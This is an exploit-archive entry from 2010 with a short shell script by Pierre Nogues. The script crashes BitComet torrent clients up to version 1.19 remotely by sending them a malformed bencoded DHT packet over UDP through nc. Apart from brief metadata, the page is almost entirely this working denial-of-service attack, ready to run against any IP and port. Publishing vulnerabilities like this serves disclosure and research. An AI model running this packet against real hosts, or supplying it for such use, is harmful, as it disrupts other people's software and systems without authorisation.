BitComet <= 1.19 Remote DoS Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BitComet <= 1.19 Remote DoS Exploit
# Published : 2010-03-31
# Author : Pierre Nogues
# Previous Title : Optimal Archive v1.38 (.zip) 0day SEH PoC
# Next Title : Escape From PDF

#!/bin/sh
#
# BitComet <= 1.19 Remote DOS Exploit
# Pierre Nogues - http://www.indahax.com/
#
# Description:
#     BitComet is a torrent client
#
#     BitComet doesn't handle malicious DHT packet with an invalid bencoded message.
#
# Affected versions :
#     BitComet <= 1.19
#
# Plateforms :
#     Windows
#
# Usage :
#     ./exploit.sh ip port

if [ $# -ne 2 ]; then
     echo "./exploit.sh ip port"
     exit 1
fi

nc -u $1 $2 << .
d4294967285:y1:q1:t4:x001:q4:ping1:ad2:id20:01234567890123456789ee
.